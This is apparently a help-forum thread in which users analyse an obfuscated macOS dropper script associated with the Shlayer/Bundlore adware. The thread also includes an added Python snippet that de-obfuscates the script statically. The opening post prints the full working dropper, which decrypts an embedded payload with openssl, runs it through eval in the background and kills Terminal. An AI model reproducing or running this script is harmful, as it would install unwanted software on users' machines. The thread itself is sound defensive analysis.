What does this command do? I've seen it in a lot of fake downloads, and I'm wondering how it works

What does this do? (I think it's malware; someone please explain how it works.)


#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19lI1c3x5jsG75i2MqkEp6BnnsxbYhGNNEAue1FVJV9tb3iame0XC4MkHJBluNzxrzAHRIaEfLdG53m5HsoftQYM86oQ4DmCvzHTgXbModNxL5uT4skXGdepJjnAsnKaUrG+Sg0H38NX5Dx9QOJHOH7rLY84emrHDWF9td75Urxvq2PNxO4X88LXHuV/IlXeoAbPhgkhNiBS9s6k8VP7p1RR1q/Ld1ySGmcvvoNXIGrHqEwGndAs/ZmXs2BMLQQ4yPxiqiG07CJfwUjzpgEirZOPfJ3BkixdvkurFrm+8jM5uWYPrP5fmZV8zsxtvOmgEyztEbZE0GDurvXuVaMyrsfGlWo5KVeiP9aW5dbjmuWEnm2SBz+H/NPa4UL56qwl6oe9K6yErvM3g=='
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall  Terminal 

Hi, welcome,

I recommend you decode it by hand and post the results.

Do not simply attempt to execute any code you don't know what the outcome is likely to be.

We look forward to seeing your results and then we can potentially move forward.

Take a look at https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/

1 Like

You might try googling decryptedFommand. That should find you several posts going back some years.

This is malicious. Nobody would need to do this for any legitimate purpose.

The first few lines just find out stuff about your system. Then it decrypts (with openssl) a concealed command, which it then runs in the background using eval, with nohup, hiding all output, and removing the terminal you started it from.

One version of the commandArgs decrypted text downloads a MacOS .dmg (Disk Image File, similar to a .iso), installs it, and runs it. But this is a generic attack method -- the URL of the download can be changed to suit the hacker and the architecture. Also, the payload can be removed to prevent anybody finding out what it was they installed.

2 Likes

Only the last two commands do something real.
Put an echo in front of them to show what they do (instead of doing it), and remove the redirections to /dev/null!

1 Like
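The replies above recommend decoding the script by hand rather than running it. The added example below (not from the thread) does the first step of that statically: it collects the one-letter variable assignments (G="a";F="c";...) and substitutes every ${X} reference, so the openssl/eval/nohup/killall lines become readable without executing anything. The input is a constructed copy of the post's structure with the ciphertext blob replaced by a placeholder; the payload is not decrypted, since the key (the archive name) is not available.

```python
"""Static de-obfuscation of the letter-variable trick in the posted script.

Nothing here is executed as shell: the script text is treated as data.
"""
import re

# Constructed sample with the same shape as the posted dropper; the real
# base64 ciphertext is replaced by a placeholder.
SAMPLE_SCRIPT = r'''#!/bin/bash
G="a";F="c";Q="d";H="e";V="l";Z="m";X="n";T="o";J="p";K="s";
export commandArgs='U2FsdGVkX1...CIPHERTEXT_PLACEHOLDER...'
decryptedFommand="$(echo -e "$commandArgs" | ${T}${J}${H}${X}${K}${K}${V} ${H}${X}${F} -${G}${H}${K}-256-cbc -${Q} -A -b${G}${K}${H}64 -${J}${G}${K}${K} "${J}${G}${K}${K}:$archive")"
nohup /bin/bash -c "${H}v${G}${V} \"$decryptedFommand\"" >/dev/null 2>&1 &
killall  Terminal
'''

# Only literal NAME="text" assignments (no $-expansion inside) form the alphabet.
ASSIGN_RE = re.compile(r'(?:^|;)\s*([A-Za-z_]\w*)="([^"$]*)"', re.M)
VAR_RE = re.compile(r'\$\{([A-Za-z_]\w*)\}')

# Behaviours worth reporting once the names are readable.
INDICATORS = {
    "decrypts an embedded payload with openssl": re.compile(r'\bopenssl\s+enc\b.*\s-d\b'),
    "runs the decrypted text through eval": re.compile(r'\beval\b'),
    "detaches from the terminal with nohup": re.compile(r'\bnohup\b'),
    "silences all output": re.compile(r'>\s*/dev/null\s+2>&1'),
    "kills Terminal to hide itself": re.compile(r'\bkillall\s+Terminal\b'),
}


def collect_assignments(script: str) -> dict:
    """Gather the literal single-quoted-free NAME="value" pairs."""
    return {name: value for name, value in ASSIGN_RE.findall(script)}


def resolve_vars(script: str) -> str:
    """Replace every ${NAME} that has a literal value; leave the rest untouched."""
    env = collect_assignments(script)
    return VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), script)


def flag_indicators(resolved: str) -> list:
    """Return human-readable behaviours found in the de-obfuscated text."""
    return [label for label, rx in INDICATORS.items() if rx.search(resolved)]


if __name__ == "__main__":
    readable = resolve_vars(SAMPLE_SCRIPT)
    print(readable)
    for hit in flag_indicators(readable):
        print("-", hit)
```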

If you try to save this code on the Mac running AVG, the results are:

[Screen shot of the AVG detection result, 2022-01-28 4:04 PM]

If you then google for this code, you will get:

"Bundlore" is an installer which bundles legitimate applications with offers for additional third party applications that may be unwanted by the user. Such third party applications are typically installed onto users’ computers by default, but may include an option to ‘opt-out’ during or after the installation process.

See also:

https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Bundlore/detailed-analysis

For more info, google "Bundlore-DY"... and you will find plenty on this code.

[Screen shot of the search results for "Bundlore-DY", 2022-01-28 4:09 PM]

HTH

6 Likes
